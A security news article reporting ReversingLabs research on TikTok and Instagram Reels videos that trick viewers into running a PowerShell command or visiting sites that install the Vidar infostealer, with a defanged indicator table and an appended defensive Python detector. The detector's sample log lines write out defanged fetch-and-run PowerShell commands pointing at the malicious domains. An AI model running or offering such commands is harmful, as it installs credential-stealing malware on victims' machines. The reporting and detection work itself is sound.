Hackers Spread Malware via Fake Software on TikTok & Reels

Marcus Rodriguez
June 10, 2026 4 Min Read

Cybercriminals are now exploiting short-form video platforms, turning TikTok and Instagram Reels into a new attack surface. They are distributing malware to unsuspecting users through fake software tutorials posted on these platforms.

The tactic is simple but remarkably effective: create polished, convincing videos that promise free access to popular premium software, then quietly funnel viewers toward malicious downloads.

The attack works because it blends in so naturally. These videos look no different from the millions of tech tips and how-to clips that flood social media every single day.

With thousands of views and hundreds of likes behind them, victims have little reason to question whether the content is genuine. That false sense of credibility is exactly what the attackers count on.

Analysts at ReversingLabs identified and analyzed two distinct campaign methods used in this threat, both managing to reach massive audiences by gaming social media recommendation algorithms.

The research was led by threat intelligence researcher Zaria Vuksan, who documented how attackers expertly exploit platform engagement mechanics to spread malware at scale across multiple platforms.

Both campaigns share the same end goal: send users to a third-party website hosting malicious software disguised as a free premium app. What differs is how each campaign builds trust before delivering the payload.

The malware deployed through these videos is Vidarstealer, a well-known infostealer offered as a service that steals login credentials, financial data, and session tokens from infected devices.

Vidarstealer received an update in October of last year, making it more evasive and harder to detect. With a lifetime license priced at around $300, it remains a favorite tool for threat actors across many campaigns.

ReversingLabs said in a report shared with Cyber Security News (CSN) that this combination of widespread social media reach and accessible malware tools creates a genuinely dangerous threat environment for everyday users and organizations alike.

Hackers Abuse TikTok and Instagram Reels

The first campaign uses accounts with usernames like “windows.tips” or “windows.insights,” paired with a blue and white profile image designed to closely mimic the official Windows social media icon.

These accounts post professional tutorial videos with AI-generated voiceovers, walking users through typing a specific PowerShell command that supposedly unlocks Spotify Premium for free.

That command instructs Windows to silently download and run a script from a remote address. When users follow the steps without question, they unknowingly execute a file identified as Vidarstealer.

What makes this especially dangerous is how clean and authoritative the videos appear, with many racking up over 100,000 views alongside thousands of saves and shares.

Screenshot of the malicious user profile showing a blue crown outline on a white background (Source - ReversingLabs)

The second campaign takes a far more casual approach to luring victims. These accounts post short, vague clips showing premium Spotify features while playing trending music, then encourage viewers to comment out of curiosity.

Image of a lure video with 1,699 saves, 1,581 likes, and 974 shares, with over 109,000 total views (Source - ReversingLabs)

Once engagement builds, the attacker replies with directions to malicious sites like pluginchad[.]xyz or d4ug[.]site, which offer fake software downloads hidden behind survey walls.

Why These Social Engineering Attacks Are Difficult to Stop

What makes this threat especially stubborn is that social media platforms are not well equipped to stop it. Researchers at ReversingLabs attempted to report malicious Instagram accounts as scams, and every single report was rejected.

Even when content is flagged, platforms act slowly, and by the time an account is removed, the damage is already done.

Attackers also suppress community warnings with considerable ease. If a viewer leaves a comment alerting others to the scam, the attacker simply deletes it and blocks that user right away.

This dynamic makes genuine self-policing nearly impossible, leaving the full burden of defense squarely on organizations and individual users to handle.

Practical defenses do exist and should be acted on now. Organizations should regularly audit who holds installation permissions on work devices, since some software promoted in these videos is framed as useful professional tools.

Phishing training programs must stay current and explicitly cover social media as an attack vector, not just email. Users should report suspicious accounts consistently, since higher report volumes do increase the likelihood of removal and can slow an attacker’s momentum.

Indicators of Compromise (IoCs):

Type | Indicator | Description
Hash | 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153 | SHA-256 hash of build.exe, identified as Vidarstealer
Domain | pluginchad[.]xyz | Malicious site hosting fake free software downloads
Domain | maxapk[.]xyz | Malicious site hosting fake free software downloads
Domain | d4ug[.]site | Fake site claiming to “Unlock premium games and AI tools”
Domain | slmgr[.]sh | Domain used in malicious PowerShell command delivery
Domain | msget[.]run | Domain used to deliver Vidarstealer via the iex/irm (Invoke-Expression / Invoke-RestMethod) command
Account | tiktok[.]com/@windows.tips1 | Malicious TikTok account used in tutorial campaign
Account | tiktok[.]com/@windows.insight | Malicious TikTok account used in tutorial campaign
Account | tiktok[.]com/@davidcooksey47 | Malicious TikTok account associated with campaign
Account | tiktok[.]com/@tracyhughe | Malicious TikTok account associated with campaign
Account | tiktok[.]com/@mr.capcut.pro2 | Malicious TikTok account associated with campaign
Account | instagram[.]com/wtips404 | Malicious Instagram account used in campaign
Account | instagram[.]com/wndwstips | Malicious Instagram account used in campaign
Account | instagram[.]com/epemberton369 | Malicious Instagram account used in campaign

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
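As an added example (not code from the article or from ReversingLabs), the following Python script refangs the table's indicators and checks log lines for the "iex (irm ...)" download cradle the tutorial videos instruct users to run, as well as for the listed domains and hash. The log lines, the "ScriptBlockText:" and "Sysmon 1:" prefixes and the IoC subset are constructed assumptions.

```python
import re

# Subset of the article's IoC table, copied in its defanged form (constructed list).
IOC_ROWS = [
    ("Domain", "slmgr[.]sh", "PowerShell command delivery"),
    ("Domain", "msget[.]run", "Vidarstealer delivery via iex irm"),
    ("Domain", "pluginchad[.]xyz", "fake software downloads"),
    ("Hash", "03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153", "build.exe"),
]

def refang(value: str) -> str:
    """Reverse the [.] / hxxp defanging so a value matches real log text (idempotent)."""
    return value.replace("[.]", ".").replace("hxxp", "http")

# Refanged indicator -> (type, description), used for substring matching in log text.
IOC_INDEX = {refang(v).lower(): (t, d) for t, v, d in IOC_ROWS}

# Download cradle: Invoke-Expression fed by Invoke-RestMethod / Invoke-WebRequest
# (or their aliases iex / irm / iwr), in either "iex (irm ...)" or "irm ... | iex" form.
_WEB = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest)"
_EXEC = r"(?:iex|invoke-expression)"
CRADLE_RE = re.compile(
    rf"\b{_EXEC}\b[^|\n]*\b{_WEB}\b|\b{_WEB}\b[^\n]*\|\s*{_EXEC}\b", re.IGNORECASE
)

def inspect_line(line: str) -> dict:
    """Verdict for one log line (e.g. a PowerShell 4104 script block or a Sysmon event 1)."""
    text = refang(line).lower()
    hits = sorted(ioc for ioc in IOC_INDEX if ioc in text)
    cradle = CRADLE_RE.search(text) is not None
    return {"cradle": cradle, "ioc_hits": hits, "alert": cradle or bool(hits)}

def scan_log(lines: list[str]) -> list[dict]:
    return [inspect_line(line) for line in lines]

# Constructed sample log lines, written in the same defanged form the article uses.
SAMPLE_LOG = [
    "ScriptBlockText: iex (irm hxxps://msget[.]run/s)",
    "ScriptBlockText: irm hxxps://slmgr[.]sh/x | iex",
    "ScriptBlockText: Get-ChildItem C:\\Users | Format-Table",
    "ScriptBlockText: Invoke-RestMethod hxxps://example.invalid/health",
    "Sysmon 1: Image=C:\\Users\\u\\Downloads\\build.exe "
    "Hashes=SHA256=03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153",
]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_LOG, scan_log(SAMPLE_LOG)):
        print("ALERT" if verdict["alert"] else "ok   ", line[:55], verdict["ioc_hits"])
```

The cradle pattern fires on the command structure itself, so it still alerts when the attacker rotates to a domain not yet in the IoC table; the fourth sample line shows that a plain Invoke-RestMethod without Invoke-Expression is not flagged.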
